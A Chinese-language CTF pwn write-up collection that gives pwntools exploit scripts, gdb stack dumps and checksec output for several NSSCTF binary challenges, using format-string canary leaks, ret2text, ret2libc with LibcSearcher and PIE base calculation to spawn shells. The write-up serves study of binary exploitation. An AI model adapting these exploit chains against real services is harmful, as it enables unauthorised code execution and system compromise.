00:0000│ rsp 0x7fffffffde78 —▸ 0x55555555537d ◂— lea rax, [rbp - 0x60]
01:0008│-060 0x7fffffffde80 ◂— 0x61616161 /* 'aaaa' */
02:0010│-058 0x7fffffffde88 —▸ 0x7ffff7e1b780 (_IO_2_1_stdout_) ◂— 0xfbad2887
03:0018│-050 0x7fffffffde90 —▸ 0x55555555615c ◂— '^^^^^^^^^^^^^^^^^^^^^^^^\n'
04:0020│-048 0x7fffffffde98 —▸ 0x7ffff7c80faa (puts+346) ◂— cmp eax, -1
05:0028│-040 0x7fffffffdea0 —▸ 0x7ffff7e17600 (_IO_file_jumps) ◂— 0
06:0030│-038 0x7fffffffdea8 —▸ 0x7ffff7c8a5ad (_IO_file_setbuf+13) ◂— test rax, rax
07:0038│-030 0x7fffffffdeb0 ◂— 0
08:0040│-028 0x7fffffffdeb8 —▸ 0x7fffffffdee0 —▸ 0x7fffffffdf00 ◂— 1
09:0048│-020 0x7fffffffdec0 —▸ 0x7fffffffe018 —▸ 0x7fffffffe383 ◂— '/home/lion/find_flag'
0a:0050│-018 0x7fffffffdec8 —▸ 0x5555555553f9 ◂— endbr64
0b:0058│-010 0x7fffffffded0 ◂— 0
0c:0060│-008 0x7fffffffded8 ◂— 0x5e42a9d8de6e0900
0d:0068│ rbp 0x7fffffffdee0 —▸ 0x7fffffffdf00 ◂— 1
0e:0070│+008 0x7fffffffdee8 —▸ 0x55555555546f ◂— mov eax, 0 //可将这个地址作为真实地址

发现canary偏移为18(%17$p,17=12+6-1),mov eax,0(%19$p)

追寻eax地址

1
2
3
4
5
6
7
8
9
10
lion@lion-virtual-machine:~$ ROPgadget --binary find_flag | grep eax
0x000000000000120e : adc eax, 0x100002e ; pop rbp ; ret
0x0000000000001085 : add eax, 0xf2000000 ; jmp 0x1020
0x00000000000013f1 : add eax, 0xfffcd9e8 ; dec ecx ; ret
0x00000000000011c7 : and eax, 0x4800002e ; test eax, eax ; je 0x11d8 ; jmp rax
0x000000000000146f : mov eax, 0 ; leave ; ret
0x0000000000001010 : test eax, eax ; je 0x1016 ; call rax
0x000000000000118b : test eax, eax ; je 0x1198 ; jmp rax
0x00000000000011cc : test eax, eax ; je 0x11d8 ; jmp rax

找到system地址:0x1231

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import*
context.log_level = 'debug'
r=process("./1")
#r=remote("node4.anna.nssctf.cn",27026)
payload=b"%17$p"+b"%19$p"
r.sendlineafter("name? ",payload)
r.recvuntil('Nice to meet you, ')
canary = int(r.recv(18),16)
real_addr = int(r.recv(14),16)
shell=0x1231
addr=0x146f
system=real_addr-addr+shell
payload=b'a'*(0x40-8)+p64(canary)+p64(0)+p64(system)
gdb.attach(r)
r.sendlineafter(b"lse? ",payload)
r.interactive()

1
2
3
4
5
6
7
8
9
10
11
 python3 exp.py
[+] Starting local process './1': pid 5853
/usr/local/lib/python3.10/dist-packages/pwnlib/tubes/tube.py:876: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
/home/voyager/exp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
r.recvuntil('Nice to meet you, ')
[*] Switching to interactive mode
flag{lllllll}
[*] Got EOF while reading in interactive
$

1770188400071

无敌题目,环境疑似被下架了,nc连不上,浪费20金币

[GFCTF 2021]where_is_shell

回顾一下:

24 30指的是0(相当于/bin/sh),而system(“0”)也可以获取权限

1
2
3
4
5
6
调用 _system(0x400430)一开始got一般是指向plt+6

PLT: jmp [GOT] (第一次是动态链接器地址)

GOT: 指向真正的 _system 地址 (libc中的实际函数)

checksec一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
~ via C v11.4.0-gcc via 🐍 v3.10.12 

❯ checksec shell
[*] '/home/voyager/shell'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12


IDA

1
2
3
4
5
6
7
8
9
int __fastcall main(int argc, const char **argv, const char **envp)
{
_BYTE buf[16]; // [rsp+0h] [rbp-10h] BYREF

system("echo 'zltt lost his shell, can you find it?'");
read(0, buf, 0x38u);
return 0;
}

发现一个tip函数,追踪一下

1
2
3
.text:0000000000400540 E8 24 30 00 00                          call    near ptr 403569h
E8是call函数,24 30是0

因此可以得到0的地址为:0x400541

system函数地址:0x00430

1
2
3
.plt:000000000040042C 0F 1F 40 00                             align 10h
.plt:0000000000400430 ; [00000006 BYTES: COLLAPSED FUNCTION _system]

pop_rdi:0x4005e3

ret:0x400416

exp:

1
2
3
4
5
6
from pwn import*
r=process("./shell")
payload=b'a'*(0x10+8)+p64(0x400416)+p64(0x4005e3)+p64(0x400541)+p64(0x400430)
r.sendline(payload)
r.interactive()

[2021 鹤城杯]littleof

checksec:

1
2
3
4
5
6
7
8
9
10
11
12
❯ checksec littleof
[*] '/home/voyager/littleof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

~ via C v11.4.0-gcc via 🐍 v3.10.12



IDA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
unsigned __int64 sub_4006E2()
{
char buf[8]; // [rsp+10h] [rbp-50h] BYREF
FILE *v2; // [rsp+18h] [rbp-48h]
unsigned __int64 v3; // [rsp+58h] [rbp-8h]

v3 = __readfsqword(0x28u);
v2 = stdin;
puts("Do you know how to do buffer overflow?");
read(0, buf, 0x100u);
printf("%s. Try harder!", buf);
read(0, buf, 0x100u);
puts("I hope you win");
return __readfsqword(0x28u) ^ v3;
}

误解

没有仔细看,这个函数是将内容传给buf,然后输出buf的内容,如果是格式化字符串那应该是printf(buf)

但是buf在v3上面,而printf函数输出的时候时遇到”\x00”时停止,那么可以将canary的\x00踢掉就行了

canary获取

1
2
3
4
5
6
7
8
9
10
11
from pwn import*
from LibcSearcher import*
elf=ELF("./littleof")
r=process("./littleof")
payload=b'a'*0x68+b'bbbb'
r.sendlineafter(b"overflow?",payload)
r.recvuntil(b"bbbb\n")
canary=u64(r.recv(7).rjust(8,b"\x00"))
print(hex(canary))
r.interactive()

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
pwndbg> plt
Section .plt 0x4005a0 - 0x400600:
0x4005b0: puts@plt
0x4005c0: __stack_chk_fail@plt
0x4005d0: printf@plt
0x4005e0: read@plt
0x4005f0: setvbuf@plt
pwndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)

State of the GOT of /home/voyager/littleof:
GOT protection: Partial RELRO | Found 5 GOT entries passing the filter
[0x601018] puts@GLIBC_2.2.5 -> 0x7ffff7c80e50 (puts) ◂— endbr64
[0x601020] __stack_chk_fail@GLIBC_2.4 -> 0x4005c6 (__stack_chk_fail@plt+6) ◂— push 1
[0x601028] printf@GLIBC_2.2.5 -> 0x4005d6 (printf@plt+6) ◂— push 2
[0x601030] read@GLIBC_2.2.5 -> 0x7ffff7d14850 (read) ◂— endbr64
[0x601038] setvbuf@GLIBC_2.2.5 -> 0x7ffff7c815f0 (setvbuf) ◂— endbr64
pwndbg>

可以发现puts函数plt和got函数地址都存在,所以直接打ret2libc,然后再返回到main函数再次执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import*
from LibcSearcher import*
elf=ELF("./littleof")
#r=remote("node4.anna.nssctf.cn",24959)
r=process("./littleof")
payload=b'a'*68+b'bbbb'
gdb.attach(r)
r.sendlineafter(b"overflow?",payload)
r.recvuntil(b"bbbb\n")
canary=u64(r.recv(7).rjust(8,b"\x00")) #\n覆盖其地址
print(hex(canary))
gdb.attach(r)
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
pop_rdi=0x400863
ret=0x40059e
main=0x400789
payload=b'a'*(0x50-8)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
r.sendlineafter(b"Try harder!",payload)
r.recvuntil(b'I hope you win')
puts=u64(r.recv(7)[-6:].ljust(8,b"\x00")) #因为puts函数会自动添加一个“\n"
print(puts)
r.interactive()

验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
wndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)

State of the GOT of /home/voyager/littleof:
GOT protection: Partial RELRO | Found 5 GOT entries passing the filter
[0x601018] puts@GLIBC_2.2.5 -> 0x7b513f080e50 (puts) ◂— endbr64
[0x601020] __stack_chk_fail@GLIBC_2.4 -> 0x4005c6 (__stack_chk_fail@plt+6) ◂— push 1
[0x601028] printf@GLIBC_2.2.5 -> 0x7b513f0606f0 (printf) ◂— endbr64
[0x601030] read@GLIBC_2.2.5 -> 0x7b513f114850 (read) ◂— endbr64
[0x601038] setvbuf@GLIBC_2.2.5 -> 0x7b513f0815f0 (setvbuf) ◂— endbr64
pwndbg>


0000003d
0x7b513f080e50
[*] running in new terminal: ['/usr/bin/gdb', '-q', './littleof', '-p', '45586']
[DEBUG] Created script for new terminal:
#!/usr/bin/python3
import os
os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './littleof', '-p', '45586'], os.environ)
[DEBUG] Launching a new terminal: ['/usr/bin/x-terminal-emulator', '-e', '/tmp/tmp2trdtcyx']
[+] Waiting for debugger: Done
[*] Switching to interactive mode

Do you know how to do buffer overflow?
$


可以看到函数成功返回到main函数地址

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import*
from LibcSearcher import*
elf=ELF("./littleof")
#r=remote("node4.anna.nssctf.cn",24959)
r=process("./littleof")
payload=b'a'*68+b'bbbb'
gdb.attach(r)
r.sendlineafter(b"overflow?",payload)
r.recvuntil(b"bbbb\n")
canary=u64(r.recv(7).rjust(8,b"\x00")) #\n覆盖其地址
print(hex(canary))
gdb.attach(r)
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
pop_rdi=0x400863
ret=0x40059e
main=0x400789
payload=b'a'*(0x50-8)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
r.sendlineafter(b"Try harder!",payload)
r.recvuntil(b'I hope you win')
puts=u64(r.recv(7)[-6:].ljust(8,b"\x00")) #因为puts函数会自动添加一个“\n"
print(puts)
libc=LibcSearcher("puts", puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")
payload=b'a'*(0x50-8)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
r.interactive()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
via C v11.4.0-gcc via 🐍 v3.10.12 

❯ python3 exp.py
[*] '/home/voyager/littleof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './littleof': pid 48264
[*] running in new terminal: ['/usr/bin/gdb', '-q', './littleof', '-p', '48264']
[+] Waiting for debugger: Done
0x9c92474b4aae9d00
[*] running in new terminal: ['/usr/bin/gdb', '-q', './littleof', '-p', '48264']
[+] Waiting for debugger: Done
128605766553168
[+] There are multiple libc that meet current constraints :
0 - libc6_2.19-4ubuntu1_amd64
1 - libc-2.35-11.mga9.x86_64_2
2 - libc-2.33-5.1.i586
3 - glibc-2.28-72.el8_1.1.x86_64
4 - libc6_2.19-4ubuntu2_amd64
5 - libc-2.35-10.mga9.x86_64_2
6 - libc-2.28-72.el8_1.1.x86_64
7 - libc-2.33-5.2.i586
8 - libc-2.33-6.1.i586
9 - libc6_2.35-0ubuntu3.8_amd64


[SWPUCTF 2021 新生赛]gift_pwn

checksec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




exp:

1
2
3
4
5
6
7
from pwn import*
#r=process("./flag")
r=remote("node7.anna.nssctf.cn",29604)
payload=b'a'*(0x10+8)+p64(0x4005C4)
r.sendline(payload)
r.interactive()

没什么好说的,感觉智商被按在地上摩擦

1
2
3
4
5
6
7
pwndbg> stack 20
00:0000│ rsi rsp 0x7fff5677c760 ◂— 0x6161616161616161 ('aaaaaaaa')
01:0008│-008 0x7fff5677c768 ◂— 0x6161616161616161 ('aaaaaaaa')
02:0010│ rbp 0x7fff5677c770 ◂— 0x6161616161616161 ('aaaaaaaa')
03:0018│+008 0x7fff5677c778 —▸ 0x4005c4 (gift+14) ◂— mov edi, 0x4006a6
04:0020│+010 0x7fff5677c780 ◂— 0xa /* '\n' */

[NISACTF 2022]ezpie

checksec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ checksec flag
[*] '/home/voyager/flag'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import*
#r=process("./flag")
#context(log_level='debug',arch='amd64', os='linux')
r=remote("node7.anna.nssctf.cn",21547)
sys=0x818
main=0x770
r.recvline()
addr=int(r.recv(10),16)
print(hex(addr))
system=addr-main+sys
payload=b'a'*(0x28+4)+p32(system)
#gdb.attach(r)
r.sendlineafter("Input:\n",payload)
#gdb.attach(r)
r.interactive()

笑死我了,看成64位了,gdb一看返回地址覆盖成AAAA

[BJDCTF 2020]babystack2.0

checksec

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12



exp

1
2
3
4
5
6
7
8
9
from pwn import*
#r=process("./flag")
r=remote("node4.anna.nssctf.cn",28287)
sys=0x40072A
r.sendlineafter(b"name:\n",b"-1")
payload=b'a'*(0x10+8)+p64(sys)
r.sendline(payload)
r.interactive()

整数溢出输入一个-1就好了,但是环境不太稳定,打5次才进去

[玄武杯 2025]ret2text 64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ checksec flag
[*] '/home/voyager/flag'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No

~ via C v11.4.0-gcc via 🐍 v3.10.12




1
2
3
4
5
6
from pwn import*
r=process("./flag")
payload=b'a'*(0x30+8)+p64(0x40136f)
r.sendlineafter(b"name\n",payload)
r.interactive()